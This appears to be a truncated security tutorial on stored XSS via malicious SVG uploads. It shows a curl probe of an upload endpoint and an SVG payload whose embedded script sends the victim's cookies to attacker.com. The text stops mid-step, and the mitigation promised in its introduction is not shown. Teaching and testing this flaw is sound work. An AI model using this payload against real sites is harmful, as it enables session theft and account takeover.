Exploiting SVG Upload Vulnerabilities: A Stored XSS Case Study

Listen to this Post

Featured Image

Introduction:

Stored Cross-Site Scripting (XSS) via malicious SVG file upload represents a significant threat to web applications that improperly handle user-supplied images. Scalable Vector Graphics (SVG) files can embed JavaScript, enabling attackers to execute persistent malicious scripts in victims’ browsers when the SVG is rendered. This case study dissects a real-world exploitation chain and provides actionable mitigation techniques.

Learning Objectives:

  • Understand how malicious SVG files enable stored XSS attacks.
  • Identify insecure file upload implementations in web applications.
  • Implement robust defenses against SVG-based XSS exploits.
  • Utilize security tools to validate upload functionality.
  • Apply secure coding practices to neutralize markup-based threats.

1. Identifying Vulnerable File Upload Handlers

curl -I -X OPTIONS https://target.com/upload_endpoint

Step-by-step guide:

  1. Use `curl` to send an OPTIONS request to the upload endpoint.
  2. Check response headers for `Allow:` or `Accept:` fields listing SVG (image/svg+xml).

3. Confirm if `Access-Control-Allow-Methods` permits `POST`/`PUT`.

  1. If SVG is accepted without validation, proceed with exploit testing.

2. Crafting the Malicious SVG Payload


<svg xmlns="http://www.w3.org/2000/svg" onload="alert(window.origin)">
<script>document.location='https://attacker.com/?cookie='+document.cookie</script>
</svg>

Step-by-step guide:

  1. Create an SVG file with embedded JavaScript in the `